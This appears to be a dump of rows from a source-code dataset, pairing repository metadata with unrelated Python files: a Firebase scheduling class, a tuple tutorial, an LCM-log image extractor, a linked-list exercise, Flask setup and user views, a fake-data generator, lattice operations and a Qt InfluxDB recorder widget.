2725dc9ac97e8e09a94b0a752b0885bc77d8a3d4
|
[
"MIT"
] | null | null | null |
from database.interface import FirebaseInterface
class Schedule:
def __init__(self):
self.id = None
self.titulo = None
self.data = None
self.caminhao = None
self.mecanico = None
def validateFields(self, office_schedule):
if self.titulo is None:
raise Exception("Título não informado")
if self.data is None:
raise Exception("Data não informada")
else:
for event in office_schedule:
if event["data"] == self.data:
raise Exception("Dia solicitado não está disponível")
if self.caminhao is None:
raise Exception("Caminhão não encontrado")
if self.mecanico is None or self.mecanico["cargo"] != "mecanico":
raise Exception("Mecânico não encontrado")
def buildObject(self, req):
interface = FirebaseInterface()
user_id = req["id_usuario"]
self.mecanico = interface.getData("users", user_id)
truck_board = req["placa_caminhao"]
self.caminhao = interface.getDataByField("trucks", "placa", truck_board)
self.data = req["data"]
self.titulo = req["titulo"]
def setId(self):
interface = FirebaseInterface()
event_id = interface.getData("const_data", "office_id")
self.id = event_id["id"] + 1
interface.updateData({"id": event_id["id"] + 1}, "const_data", "office_id")
@staticmethod
def findIdIndex(id, office):
for index in range(len(office)):
if office[index]["id"] == id:
return index
elif index + 1 == len(office) and office[index]["id"] != id:
raise Exception("Id inválido")
| 30.403509
| 83
| 0.590306
| 1,692
| 0.970183
| 0
| 0
| 279
| 0.159977
| 0
| 0
| 305
| 0.174885
|
3c6c95883a2948952fd4f838b95cb8573feed183
| 381
|
py
|
Python
|
Python/DS/tuple.py
|
salikansari6/interview-prep
|
17e98fbb15f87c9f2ecd293896e613f5fe01d3a3
|
[
"MIT"
] | 1
|
2021-08-23T18:18:41.000Z
|
2021-08-23T18:18:41.000Z
|
Python/DS/tuple.py
|
salikansari6/interview-prep
|
17e98fbb15f87c9f2ecd293896e613f5fe01d3a3
|
[
"MIT"
] | null | null | null |
Python/DS/tuple.py
|
salikansari6/interview-prep
|
17e98fbb15f87c9f2ecd293896e613f5fe01d3a3
|
[
"MIT"
] | 1
|
2021-08-24T15:40:15.000Z
|
2021-08-24T15:40:15.000Z
|
# Tuples are immutable
print("============ tuples ============")
print()
tuples = (12345, 54321, 'hello!')
print(tuples)
u = tuples, (1, 2, 3, 4, 5)
print(u)
# The statement tuples = (12345, 54321, 'hello!') above is an example of tuple
# packing: the values 12345, 54321 and 'hello!' are packed together in a tuple.
# The reverse operation (sequence unpacking) is also possible:
x, y, z = tuples
print(x, y, z)
| 22.411765
| 74
| 0.627297
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 248
| 0.650919
|
3c6cfcc4cc77979d142a645197f0b512545357ec
| 4,304
|
py
|
Python
|
modules/labelfusion/imagecapture.py
|
hz-ants/LabelFusion-docker2-
|
8dc116064a1bdcfa2c2dd814580b5f43d46c6f40
|
[
"BSD-3-Clause"
] | 313
|
2017-07-16T02:00:16.000Z
|
2022-03-31T11:00:10.000Z
|
modules/labelfusion/imagecapture.py
|
hz-ants/LabelFusion-docker2-
|
8dc116064a1bdcfa2c2dd814580b5f43d46c6f40
|
[
"BSD-3-Clause"
] | 94
|
2017-07-16T19:59:06.000Z
|
2022-03-30T08:14:22.000Z
|
modules/labelfusion/imagecapture.py
|
hz-ants/LabelFusion-docker2-
|
8dc116064a1bdcfa2c2dd814580b5f43d46c6f40
|
[
"BSD-3-Clause"
] | 87
|
2017-07-14T16:01:54.000Z
|
2022-03-23T17:33:47.000Z
|
"""
This class consumes and lcmlog, extracts the images and saves them
to png
"""
import os
# director imports
import director.vtkAll as vtk
from director import filterUtils
from director import lcmUtils
from director import cameraview
import bot_core as lcmbotcore
from . import utils
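# Note: this module is written for Python 2 (bare print statements below) and an
# older VTK API (vtkPNGWriter.SetInput rather than SetInputData).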
class ImageCapture(object):
def __init__(self, imageManager, fileSaveLocation,
cameraName="OPENNI_FRAME_LEFT", setupCallback=False):
self.imageManager = imageManager
self.fileSaveLocation = fileSaveLocation
self.cameraName = cameraName
self.counter = 1
self.initialized = False
if setupCallback:
self.setupCallback()
def setupCallback(self):
lcmUtils.addSubscriber("OPENNI_FRAME", lcmbotcore.images_t(),
self.onImageMessage)
def saveImage(self, saveUtime=True, extension="rgb.png"):
# construct filename where this image will be saved
baseFilename = utils.convertImageIDToPaddedString(self.counter) + "_"
baseFilename = os.path.join(self.fileSaveLocation, baseFilename)
imageFilename = baseFilename + extension
self.counter += 1
# get the image and it's utime
self.imageManager.updateImages()
image = self.imageManager.getImage(self.cameraName)
image = filterUtils.flipImage(image)
print 'writing:', imageFilename
ImageCapture.writeImage(image, imageFilename)
if saveUtime:
utime = self.imageManager.getUtime(self.cameraName)
utimeFilename = baseFilename + "utime.txt"
# now save the utime
print 'writing:', utimeFilename
text_file = open(utimeFilename, "w")
text_file.write(str(utime))
text_file.close()
@staticmethod
def writeImage(image, filename):
"""
Writes given image to filename
:param image: vtkImageData
:param filename: full path to file where image should be saved
:return:
"""
writer = vtk.vtkPNGWriter()
writer.SetInput(image)
writer.SetFileName(filename)
writer.Write()
def onImageMessage(self, msg):
"""
Just a trigger to save message
:param msg:
:return:
"""
if not self.initialized:
self.initialized = True
return
self.saveImage()
@staticmethod
def readFromLogFile(lcmLogFilename, fileSaveLocation, channelName="OPENNI_FRAME", cameraName="OPENNI_FRAME_LEFT", saveDepth=False):
"""
Reads from lcmlog located at filename. Goes through each
images_t() message on OPENNI_FRAME channel and saves it
as a png in fileSaveLocation
:param filename: Name of lcmlogfile
:return:
"""
# check if fileSaveLocation is an existing directory, if not create it.
if not os.path.isdir(fileSaveLocation):
os.makedirs(fileSaveLocation)
# construct imageManager object
imageManager = cameraview.ImageManager()
if saveDepth:
imageManager.queue.addCameraStream(channelName, cameraName, lcmbotcore.images_t.DEPTH_MM_ZIPPED)
else:
imageManager.queue.addCameraStream(channelName, cameraName, lcmbotcore.images_t.LEFT)
imageManager.addImage(cameraName)
# open the lcm log
imageManager.queue.openLCMFile(lcmLogFilename)
imageCapture = ImageCapture(imageManager, fileSaveLocation,
cameraName=cameraName, setupCallback=False)
while imageManager.queue.readNextImagesMessage():
if saveDepth:
imageCapture.saveImage(saveUtime=False, extension="depth.png")
else:
imageCapture.saveImage(extension="rgb.png")
print "reached end of lcm log"
return
def captureImages(logFolder, saveDepth):
dataPaths = utils.getFilenames(logFolder)
if saveDepth:
ImageCapture.readFromLogFile(dataPaths['lcmlog'], dataPaths['images'], cameraName="OPENNI_FRAME_DEPTH_MM_ZIPPED", saveDepth=True)
ImageCapture.readFromLogFile(dataPaths['lcmlog'], dataPaths['images'], cameraName="OPENNI_FRAME_LEFT")
def test():
captureImages("logs/moving-camera")
| 32.360902
| 137
| 0.657528
| 3,601
| 0.836664
| 0
| 0
| 1,820
| 0.422862
| 0
| 0
| 1,087
| 0.252556
|
3c6d83deebd752e29ffb47bbb2f60866fbe395f9
| 1,947
|
py
|
Python
|
pattern6-in-place-reversal-of-a-linkedlist/4. Reverse alternating K-element Sub-list (medium).py
|
dopiwoo/Grokking-the-Coding-Interview
|
78b2bacf9d761b460ac78882bac42df7465feec9
|
[
"MIT"
] | null | null | null |
pattern6-in-place-reversal-of-a-linkedlist/4. Reverse alternating K-element Sub-list (medium).py
|
dopiwoo/Grokking-the-Coding-Interview
|
78b2bacf9d761b460ac78882bac42df7465feec9
|
[
"MIT"
] | null | null | null |
pattern6-in-place-reversal-of-a-linkedlist/4. Reverse alternating K-element Sub-list (medium).py
|
dopiwoo/Grokking-the-Coding-Interview
|
78b2bacf9d761b460ac78882bac42df7465feec9
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 3 16:59:33 2021
@author: dopiwoo
Given the head of a LinkedList and a number 'k', reverse every alternating 'k' sized sub-list starting from the head.
If, in the end, you are left with a sub-list with less than 'k' elements, reverse it too.
"""
class Node:
def __init__(self, value: int, next_node: 'Node' = None):
self.value = value
self.next = next_node
def __repr__(self) -> str:
string = ''
temp_node = self
while temp_node is not None:
string += '->' + str(temp_node.value)
temp_node = temp_node.next
return string[2:]
def reverse_alternative_k_elements(head: Node, k: int) -> Node or None:
"""
Time Complexity: O(N)
Space Complexity: O(1)
Parameters
----------
head : Node
Input head of a LinkedList.
k : int
Input number 'k'.
Returns
-------
Node or None
The LinkedList reversed every alternating 'k' sized sub-list starting from the head.
"""
if not head:
return None
cur, prev = head, None
while cur:
i = 0
tail, con = cur, prev
while cur and i < k:
third = cur.next
cur.next = prev
prev = cur
cur = third
i += 1
if con:
con.next = prev
else:
head = prev
tail.next = cur
i = 0
while cur and i < k:
prev = cur
cur = cur.next
i += 1
return head
if __name__ == '__main__':
a = Node(1)
a.next = Node(2)
a.next.next = Node(3)
a.next.next.next = Node(4)
a.next.next.next.next = Node(5)
a.next.next.next.next.next = Node(6)
a.next.next.next.next.next.next = Node(7)
a.next.next.next.next.next.next.next = Node(8)
print(a)
print(reverse_alternative_k_elements(a, 2))
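    # Expected output: 1->2->3->4->5->6->7->8 (the original list), then
    # 2->1->3->4->6->5->7->8 (alternating groups of k=2 reversed).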
| 24.037037
| 117
| 0.546482
| 359
| 0.184386
| 0
| 0
| 0
| 0
| 0
| 0
| 658
| 0.337956
|
3c6ebf3a0e9fc7f67c121517ca72e84e2133c821
| 833
|
py
|
Python
|
scripts/datasets/dataset.py
|
daniele21/Financial_Sentiment_Analysis
|
3734733f2d1d291c81a6239de121edcce861b463
|
[
"MIT"
] | null | null | null |
scripts/datasets/dataset.py
|
daniele21/Financial_Sentiment_Analysis
|
3734733f2d1d291c81a6239de121edcce861b463
|
[
"MIT"
] | null | null | null |
scripts/datasets/dataset.py
|
daniele21/Financial_Sentiment_Analysis
|
3734733f2d1d291c81a6239de121edcce861b463
|
[
"MIT"
] | 1
|
2021-08-18T01:40:56.000Z
|
2021-08-18T01:40:56.000Z
|
from typing import Text, Dict
import torch
from torch.utils.data import Dataset
class MyDataset:
def __init__(self, filepath: Text):
self.data = self.load_data(filepath)
self.prep_data = None
def load_data(self, filepath):
pass
def get_x(self, data=None):
pass
def get_y(self, data=None):
pass
def training_preprocessing(self):
pass
def test_preprocessing(self, data=None):
pass
def postprocessing(self, prediction, model_name):
pass
class NN_Dataset(Dataset):
def __init__(self, x, y):
self.x = torch.IntTensor(x)
self.y = torch.IntTensor(y)
def __getitem__(self, index):
torch.FloatTensor()
return self.x[index], self.y[index]
def __len__(self):
return len(self.x)
| 16.333333
| 53
| 0.619448
| 740
| 0.888355
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
3c6f84e2e28d5d42137620dfcf9d443aafcc4dc6
| 1,447
|
py
|
Python
|
citadel/ext.py
|
CMGS/citadel
|
8363a598ed4422d6671f06bad7def3ebb848f441
|
[
"MIT"
] | null | null | null |
citadel/ext.py
|
CMGS/citadel
|
8363a598ed4422d6671f06bad7def3ebb848f441
|
[
"MIT"
] | null | null | null |
citadel/ext.py
|
CMGS/citadel
|
8363a598ed4422d6671f06bad7def3ebb848f441
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from authlib.client.apps import github
from authlib.flask.client import OAuth
from etcd import Client
from flask import session
from flask_caching import Cache
from flask_mako import MakoTemplates
from flask_session import Session
from flask_sockets import Sockets
from flask_sqlalchemy import SQLAlchemy
from redis import Redis
from citadel.config import ZONE_CONFIG, REDIS_URL
from citadel.libs.utils import memoize
@memoize
def get_etcd(zone):
cluster = ZONE_CONFIG[zone]['ETCD_CLUSTER']
return Client(cluster, allow_reconnect=True)
db = SQLAlchemy()
mako = MakoTemplates()
sockets = Sockets()
rds = Redis.from_url(REDIS_URL)
def fetch_token(oauth_app_name):
token_session_key = '{}-token'.format(oauth_app_name.lower())
return session.get(token_session_key, {})
def update_token(oauth_app_name, token):
token_session_key = '{}-token'.format(oauth_app_name.lower())
session[token_session_key] = token
# I don't think return token was necessary, but that's what the example
# does in the docs: https://docs.authlib.org/en/latest/client/frameworks.html#cache-database
return token
def delete_token(oauth_app_name):
token_session_key = '{}-token'.format(oauth_app_name.lower())
    session.pop(token_session_key, None)
oauth = OAuth(fetch_token=fetch_token, update_token=update_token)
github.register_to(oauth)
cache = Cache(config={'CACHE_TYPE': 'redis'})
sess = Session()
| 27.301887
| 96
| 0.769178
| 0
| 0
| 0
| 0
| 125
| 0.086386
| 0
| 0
| 249
| 0.17208
|
3c6f8f5f4f2e782fc4abccdc891d3ed15ff06ea9
| 6,625
|
py
|
Python
|
generate_fake_data.py
|
upb-uc4/deployment
|
0c82de72bb7e758c5afaf8866b238ff17cf908ea
|
[
"Apache-2.0"
] | null | null | null |
generate_fake_data.py
|
upb-uc4/deployment
|
0c82de72bb7e758c5afaf8866b238ff17cf908ea
|
[
"Apache-2.0"
] | 2
|
2021-02-13T13:19:45.000Z
|
2021-02-13T14:46:02.000Z
|
generate_fake_data.py
|
upb-uc4/deployment
|
0c82de72bb7e758c5afaf8866b238ff17cf908ea
|
[
"Apache-2.0"
] | null | null | null |
import json
import random
import os
import re
from faker import Faker
################################################################################
# Some settings:
################################################################################
ADMIN_COUNT = 2
STUDENT_COUNT = 40
LECTURER_COUNT = 10
EXAM_REG_COUNT = 6
COURSE_COUNT = 10
ROLES = ["Student", "Admin", "Lecturer"]
FIELDS_OF_STUDY = [
"Computer Science",
"Chemistry",
"Biology",
"Physics",
"Religion",
"Sociology",
]
MODULE_PREFICES = [
"Topics of",
"Introduction to",
"Applied",
"Theorotical",
"Experimental",
]
COURSE_TYPES = ["Lecture", "Project Group", "Seminar"]
COUNTRIES = ["Germany", "United States", "Italy", "France", "United Kingdom", "Belgium", "Netherlands", "Spain", "Austria", "Switzerland", "Poland"]
fake = Faker("en-US")
fake.random.seed(654321)
################################################################################
basepath = os.path.join("defaults", "generated")
lecturer_ids = []
modules_by_field_of_study = {
field: [] for field in FIELDS_OF_STUDY
} # Dict with modules mapped to their field of study (to let generated data appear less random)
def generate_user(role: str):
assert role in ROLES
strip_username = lambda username: re.sub("^[a-zA-Z-.]", "", username)
profile = fake.simple_profile()
while (
len(profile["name"].split(" ")) != 2
and len(strip_username(profile["username"])) not in range(5,17)
): # Some names were like Mr. John Smith...
profile = fake.simple_profile()
username = strip_username(profile["username"])
return {
"governmentId": username + fake.pystr(),
"authUser": {
"username": username,
"password": username, # more convenient than fake.password(),
"role": role,
},
"user": {
"username": username,
"enrollmentIdSecret": "",
"isActive": True,
"role": role,
"address": {
"street": fake.street_name(),
"houseNumber": fake.building_number().lstrip("0"),
"zipCode": fake.postcode(),
"city": fake.city(),
"country": random.choice(COUNTRIES)
},
"firstName": profile["name"].split(" ")[0],
"lastName": profile["name"].split(" ")[1],
"email": profile["mail"],
"birthDate": profile["birthdate"].strftime("%Y-%m-%d"),
"phoneNumber": "+{:012d}".format(fake.pyint(0, int("9"*12))),
},
}
def generate_student():
student = generate_user("Student")
student["user"]["latestImmatriculation"] = ""
student["user"]["matriculationId"] = str(fake.pyint(1000000, 9999999))
return student
def generate_lecturer(all_lecturer_ids: list):
lecturer = generate_user("Lecturer")
lecturer["user"]["freeText"] = fake.paragraph()
lecturer["user"]["researchArea"] = fake.job()
all_lecturer_ids.append(lecturer["user"]["username"])
return lecturer
def generate_admin():
return generate_user("Admin")
def generate_exam_reg(all_modules: list):
field_of_study = random.choice(FIELDS_OF_STUDY)
my_modules = []
count = random.randint(2, 5) # Random number of modules for this exam reg
for _ in range(count):
# Choose existing or generate new module for this exam reg
if random.random() < 0.8 or not my_modules:
new_module = {
"id": "M."
+ str(fake.pyint(0, 9999)).zfill(4)
+ "."
+ str(fake.pyint(0, 99999)).zfill(5),
"name": random.choice(MODULE_PREFICES) + " " + field_of_study,
}
all_modules[field_of_study].append(new_module)
my_modules.append(new_module)
elif (
field_of_study in modules_by_field_of_study
and modules_by_field_of_study[field_of_study]
):
module_cand = random.choice(modules_by_field_of_study[field_of_study])
if module_cand and module_cand not in my_modules:
my_modules.append(module_cand)
return {
"name": random.choice(["Bachelor", "Master"])
+ " "
+ field_of_study
+ " v"
+ str(fake.pyint(1, 8)),
"active": True,
"modules": my_modules,
}
def generate_course():
lecturer = random.choice(lecturer_ids)
flatten = lambda list_to_flatten: [
item for sub_list in list_to_flatten for item in sub_list
]
all_module_ids = set(
map(
lambda module: module.get("id"), flatten(modules_by_field_of_study.values())
)
)
module_ids = random.sample(all_module_ids, random.randint(1, 4))
return {
"courseId": "",
"moduleIds": module_ids,
"courseName": fake.catch_phrase(),
"courseType": random.choice(COURSE_TYPES),
"startDate": "2020-12-08",
"endDate": "2020-12-08",
"ects": random.randint(3, 10),
"lecturerId": lecturer,
"maxParticipants": 10 * random.randint(1, 20),
"currentParticipants": 0,
"courseLanguage": random.choice(["German", "English"]),
"courseDescription": fake.paragraph(2),
}
def write_to_file(data, _dir, filename):
directory = os.path.join(os.path.dirname(__file__), basepath, _dir)
if not os.path.exists(directory):
os.makedirs(directory)
with open(os.path.join(directory, filename), "w+") as f:
f.write(data)
def json_dump_dict(data: dict):
return json.dumps(data, indent=4)
for i in range(ADMIN_COUNT):
write_to_file(
json_dump_dict(generate_student()), "admins", str(i).zfill(2) + ".json"
)
for i in range(STUDENT_COUNT):
write_to_file(
json_dump_dict(generate_student()), "students", str(i).zfill(2) + ".json"
)
for i in range(LECTURER_COUNT):
write_to_file(
json_dump_dict(generate_lecturer(lecturer_ids)),
"lecturers",
str(i).zfill(2) + ".json",
)
for i in range(EXAM_REG_COUNT):
write_to_file(
json_dump_dict(generate_exam_reg(modules_by_field_of_study)),
"examRegs",
str(i).zfill(2) + ".json",
)
for i in range(COURSE_COUNT):
write_to_file(
json_dump_dict(generate_course()), "courses", str(i).zfill(2) + ".json"
)
print("Done! 😎")
print(
"Generated: {} Admins, {} Students, {} Lecturers, {} Exam Regs and {} Courses".format(
ADMIN_COUNT, STUDENT_COUNT, LECTURER_COUNT, EXAM_REG_COUNT, COURSE_COUNT
)
)
| 30.113636
| 148
| 0.579019
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,758
| 0.265238
|
3c70133f7cd579129c6a6ff4af02a403f5a5c1b6
| 2,972
|
py
|
Python
|
CodeMixed-Text-Generator/cm_text_generator/lattice_operations.py
|
mohdsanadzakirizvi/CodeMixed-Text-Generator
|
47740eeff3ecb46f5294711f4fe5d3a03a6e0b54
|
[
"MIT"
] | 16
|
2021-06-03T07:16:15.000Z
|
2022-03-24T13:07:31.000Z
|
CodeMixed-Text-Generator/cm_text_generator/lattice_operations.py
|
mohdsanadzakirizvi/CodeMixed-Text-Generator
|
47740eeff3ecb46f5294711f4fe5d3a03a6e0b54
|
[
"MIT"
] | 6
|
2021-06-30T12:06:33.000Z
|
2022-02-10T04:49:10.000Z
|
CodeMixed-Text-Generator/cm_text_generator/lattice_operations.py
|
mohdsanadzakirizvi/CodeMixed-Text-Generator
|
47740eeff3ecb46f5294711f4fe5d3a03a6e0b54
|
[
"MIT"
] | 4
|
2021-07-04T14:21:56.000Z
|
2021-08-23T19:55:06.000Z
|
###LATTICE OPERATIONS
from .data_structure_definitions import *
def trimTrapStates(doof):
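    # Repeatedly delete "trap" states that have no outgoing transitions and are
    # not one of the designated end states (engEnd/mixEnd/hinEnd) or final states.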
flag = 1
while flag == 1:
flag = 0
statesToDelete = []
dict_items = set([t[0][0] for t in doof.transitions.items()])
for i, state in enumerate(doof.states):
if state not in dict_items:
# if len([0 for (k, v) in dict_items if k[0] == state]) == 0:
if state != doof.engEnd and state != doof.mixEnd and state != doof.hinEnd and state not in doof.finalStates:
statesToDelete.append(state)
flag = 1
for state in statesToDelete:
doof.deleteState(state)
def mergeEquivalentStates(doof):
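    # Repeatedly merge pairs of states whose outgoing (label, target) transitions
    # are identical, until no such pair remains.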
flag = 1
while flag == 1:
flag = 0
toMerge = []
for state1 in doof.states:
for state2 in doof.states:
if state1 != state2:
transitions1 = [(k[1], v) for k,v in doof.transitions.items() if k[0] == state1]
transitions2 = [(k[1], v) for k,v in doof.transitions.items() if k[0] == state2]
if transitions1!=[] and transitions2!=[] and transitions1 == transitions2:
toMerge.append((state1, state2))
flag = 1
for pair in toMerge:
if pair[0] in doof.states and pair[1] in doof.states:
# print 'deleting these:'
# print pair[0], pair[1]
doof.mergeStates(pair[0], [pair[1]])
def removeUselessStates(doof):
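    # Delete states that have no incoming transitions (other than state 0), and
    # splice out pass-through states with exactly one incoming and one outgoing
    # transition by concatenating the two labels (the incoming label's last two
    # characters are dropped before joining).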
statesToRemove = []
for state in doof.states:
transIn = {k: v for k, v in doof.transitions.items() if v == state}
transOut = {k: v for k, v in doof.transitions.items() if k[0] == state}
if state != 0 and len(transIn) == 0:
statesToRemove.append(state)
if len(transIn) == 1 and len(transOut) == 1:
keys_in = list(transIn.keys())
keys_out = list(transOut.keys())
values_out = list(transOut.values())
doof.addTransition(keys_in[0][0], keys_in[0][1][:-2]+" "+keys_out[0][1], values_out[0])
del doof.transitions[keys_in[0]]
del doof.transitions[keys_out[0]]
statesToRemove.append(state)
for state in statesToRemove:
doof.deleteState(state)
def removeDollarTransitions(doof):
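    # Remove null ("$_h"/"$_e") transitions: when the target state has no other
    # incoming transition, the transition is deleted and its endpoints merged;
    # otherwise a warning is printed.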
dollarTransitions = {k:v for k,v in doof.transitions.items() if k[1] == "$_h" or k[1] == "$_e"}
for k,v in dollarTransitions.items():
transitionsToSink = {kk:vv for kk,vv in doof.transitions.items() if vv == v}
if len(transitionsToSink) == 1:
del doof.transitions[k]
doof.mergeStates(k[0], [v])
else:
print("null transition between" + str(k[0]) + "and" + str(v) + "could not be removed")
def removeUnreachableStates(doof):
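    # Repeatedly delete states (other than the initial state) that have no
    # incoming transitions.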
flag = 1
while flag == 1:
flag = 0
statesToDelete = []
for state in doof.states:
if len({k: v for k, v in doof.transitions.items() if v == state}) == 0:
if state != doof.initialStates[0]:
statesToDelete.append(state)
flag = 1
for state in statesToDelete:
doof.deleteState(state)
| 33.393258
| 116
| 0.605316
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 196
| 0.065949
|
3c71ada98a6d21e9df0e6b1ca11604cd29f59b82
| 2,949
|
py
|
Python
|
vnpy/app/influx_recorder/ui/widget.py
|
hadrianl/vnpy
|
f197df974eb6d3a0fddb81b591dd98d3d102a4a2
|
[
"MIT"
] | 5
|
2019-05-24T05:19:55.000Z
|
2020-07-29T13:21:49.000Z
|
vnpy/app/influx_recorder/ui/widget.py
|
hadrianl/vnpy
|
f197df974eb6d3a0fddb81b591dd98d3d102a4a2
|
[
"MIT"
] | null | null | null |
vnpy/app/influx_recorder/ui/widget.py
|
hadrianl/vnpy
|
f197df974eb6d3a0fddb81b591dd98d3d102a4a2
|
[
"MIT"
] | 2
|
2019-07-01T02:14:04.000Z
|
2020-07-29T13:21:53.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2020/10/28 0028 11:34
# @Author : Hadrianl
# @File : widget
from vnpy.event import EventEngine, Event
from vnpy.trader.engine import MainEngine
from vnpy.trader.ui import QtWidgets, QtCore
from ..engine import APP_NAME
class InfluxRecorder(QtWidgets.QWidget):
""""""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super().__init__()
self.main_engine = main_engine
self.event_engine = event_engine
self.influx_record_engine = main_engine.get_engine(APP_NAME)
self.init_ui()
def init_ui(self):
""""""
self.setWindowTitle("InfluxRecorder")
self.setFixedWidth(900)
self.setFixedHeight(500)
self.start_button = QtWidgets.QPushButton("启动")
self.start_button.clicked.connect(self.start_recorder)
self.stop_button = QtWidgets.QPushButton("停止")
self.stop_button.clicked.connect(self.stop_recorder)
self.stop_button.setEnabled(False)
for button in [self.start_button, self.stop_button]:
hint = button.sizeHint()
button.setFixedHeight(hint.height() * 2)
button.setFixedWidth(hint.width() * 4)
self.host_line = QtWidgets.QLineEdit(self.influx_record_engine.host)
self.host_line.setFixedWidth(300)
self.port_line = QtWidgets.QLineEdit(str(self.influx_record_engine.port))
self.port_line.setFixedWidth(300)
self.user_line = QtWidgets.QLineEdit(self.influx_record_engine.user)
self.user_line.setFixedWidth(300)
self.password_line = QtWidgets.QLineEdit(self.influx_record_engine.password)
self.password_line.setFixedWidth(300)
self.password_line.setEchoMode(QtWidgets.QLineEdit.Password)
form = QtWidgets.QFormLayout()
form.addRow("influxdb主机", self.host_line)
form.addRow("influxdb端口", self.port_line)
form.addRow("influxdb用户名", self.user_line)
form.addRow("influxdb密码", self.password_line)
hbox = QtWidgets.QHBoxLayout()
hbox.addLayout(form)
hbox.addWidget(self.start_button)
hbox.addWidget(self.stop_button)
hbox.addStretch()
vbox = QtWidgets.QVBoxLayout()
vbox.addLayout(hbox)
# vbox.addWidget(self.log_monitor)
self.setLayout(vbox)
def start_recorder(self):
""""""
host = self.host_line.text()
port = int(self.port_line.text())
user = self.user_line.text()
password = self.password_line.text()
self.influx_record_engine.start_recorder(host, port, user, password)
self.start_button.setEnabled(False)
self.stop_button.setEnabled(True)
def stop_recorder(self):
""""""
self.influx_record_engine.stop_recorder()
self.start_button.setEnabled(True)
self.stop_button.setEnabled(False)
| 31.709677
| 84
| 0.665649
| 2,687
| 0.903193
| 0
| 0
| 0
| 0
| 0
| 0
| 282
| 0.09479
|
3c749728947c088616bb2bf3b46fdb1485731043
| 5,021
|
py
|
Python
|
application/views/client/users/views.py
|
Zinston/giftr
|
997d4b8127b34cc0009621d66f69bc00ed3b985a
|
[
"Apache-2.0"
] | null | null | null |
application/views/client/users/views.py
|
Zinston/giftr
|
997d4b8127b34cc0009621d66f69bc00ed3b985a
|
[
"Apache-2.0"
] | null | null | null |
application/views/client/users/views.py
|
Zinston/giftr
|
997d4b8127b34cc0009621d66f69bc00ed3b985a
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
"""Define routes for CRUD operations on users."""
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from application.models import (Base,
Gift,
Claim,
User)
from flask import (request,
redirect,
url_for,
render_template,
flash,
session,
Blueprint)
# For making decorators
from functools import wraps
# Bind database
engine = create_engine('sqlite:///giftr.db')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
c = DBSession()
users_blueprint = Blueprint('users', __name__, template_folder='templates')
# DECORATORS
def login_required(f):
"""Redirect to login page if the user is not logged in (decorator)."""
@wraps(f)
def decorated_function(*args, **kwargs):
if 'username' not in session:
flash('You need to be logged in to see that page.')
return redirect(url_for('login.show'))
return f(*args, **kwargs)
return decorated_function
def include_user(f):
"""Take a u_id kwarg and return a user object (decorator)."""
@wraps(f)
def decorated_function(*args, **kwargs):
u_id = kwargs['u_id']
user = c.query(User).filter_by(id=u_id).one_or_none()
if not user:
flash('There\'s no user here.')
return redirect(url_for('gifts.get'))
# pass along the gift object to the next function
kwargs['user'] = user
return f(*args, **kwargs)
return decorated_function
def user_required(f):
"""Take a user id (u_id) and redirect to home if logged in user doesn't match that id (decorator).""" # noqa
@wraps(f)
def decorated_function(*args, **kwargs):
u_id = kwargs['u_id']
if u_id != session.get('user_id'):
flash('You can only do this for your own profile.')
return redirect(url_for('gifts.get'))
return f(*args, **kwargs)
return decorated_function
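# Illustration of how the decorators above combine on the routes below: wrapper
# functions execute top-down at request time, so a stack such as
#     @login_required
#     @user_required
#     @include_user
#     def edit_post(u_id, user): ...
# checks the session first, then the id match, and only then queries the user
# and injects it into kwargs as `user`.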
# ROUTES
@users_blueprint.route('/users/<int:u_id>/profile', methods=['GET'])
@login_required
@include_user
def get_byid(u_id, user):
"""Render a user with id u_id's profile.
Argument:
u_id (int): the id of the desired user.
user (object): generally passed through the @include_user decorator,
contains a user object of id u_id.
"""
return render_template('user.html',
user=user)
@users_blueprint.route('/users/<int:u_id>/edit', methods=['GET'])
@login_required
def edit_get(u_id):
"""Render an edit form for the logged in user.
Login required.
Argument:
u_id (int): the id of the desired user.
"""
return render_template('edit_user.html')
@users_blueprint.route('/users/<int:u_id>/edit', methods=['POST'])
@login_required
@user_required
@include_user
def edit_post(u_id, user):
"""Edit a user of id u_id with POST.
Login required.
One has to be logged in as the requested user to access this.
Arguments:
u_id (int): the id of the desired user.
user (object): generally passed through the @include_user decorator,
contains a user object of id u_id.
"""
user.name = request.form.get('name')
user.picture = request.form.get('picture')
user.email = request.form.get('email')
user.address = request.form.get('address')
c.add(user)
c.commit()
session['username'] = user.name
session['picture'] = user.picture
session['email'] = user.email
session['address'] = user.address
flash("Your account was successfully edited.")
return redirect(url_for('users.get_byid',
u_id=user.id))
@users_blueprint.route('/users/<int:u_id>/delete', methods=['GET'])
@login_required
def delete_get(u_id):
"""Render a delete form for the logged in user.
Login required.
Arguments:
u_id (int): the id of the desired user.
"""
return render_template('delete_user.html')
@users_blueprint.route('/users/<int:u_id>/delete', methods=['POST'])
@login_required
@include_user
@user_required
def delete_post(u_id, user):
"""Delete a user of id u_id with POST.
Login required.
One has to be the creator of the gift to access this.
Argument:
u_id (int): the id of the desired user.
user (object): generally passed through the @include_user decorator,
contains a user object of id u_id.
"""
# Delete the gifts of that user too
user_gifts = c.query(Gift).filter_by(creator_id=user.id).all()
for gift in user_gifts:
# Delete the claims to that gift first
claims = c.query(Claim).filter_by(gift_id=gift.id).all()
for claim in claims:
c.delete(claim)
c.delete(gift)
c.delete(user)
c.commit()
flash("Your account was successfully deleted.")
return redirect(url_for('logout.disconnect'))
| 28.050279
| 113
| 0.632344
| 0
| 0
| 0
| 0
| 3,803
| 0.757419
| 0
| 0
| 2,221
| 0.442342
|
3c7515d17c45501d0f2599188199dfb75f86e5a6
| 2,077
|
py
|
Python
|
server.py
|
mleger45/embevent
|
c717adb6d172b83ae12cb82021df856831a4e4fb
|
[
"MIT"
] | null | null | null |
server.py
|
mleger45/embevent
|
c717adb6d172b83ae12cb82021df856831a4e4fb
|
[
"MIT"
] | null | null | null |
server.py
|
mleger45/embevent
|
c717adb6d172b83ae12cb82021df856831a4e4fb
